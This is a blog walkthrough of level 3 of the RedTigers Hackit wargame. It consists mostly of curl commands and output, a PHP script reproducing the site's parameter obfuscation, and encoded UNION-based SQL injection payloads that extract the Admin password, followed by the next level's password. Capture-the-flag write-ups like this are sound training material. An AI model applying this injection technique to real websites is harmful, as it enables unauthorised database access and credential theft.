# RedTigers Hackit wargame: Level 3 


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 function encrypt($str) {
  $cryptedstr = "";
  for ($i =0; $i < strlen($str); $i++){
   $temp = ord(substr($str,$i,1)) ^ 192;
   while(strlen($temp)<3){
    $temp = "0".$temp;
   }
   $cryptedstr .= $temp. "";
  }
  return base64_encode($cryptedstr);
 }
 echo encrypt($argv[1])."\n";
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>
Posted by t0n1
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)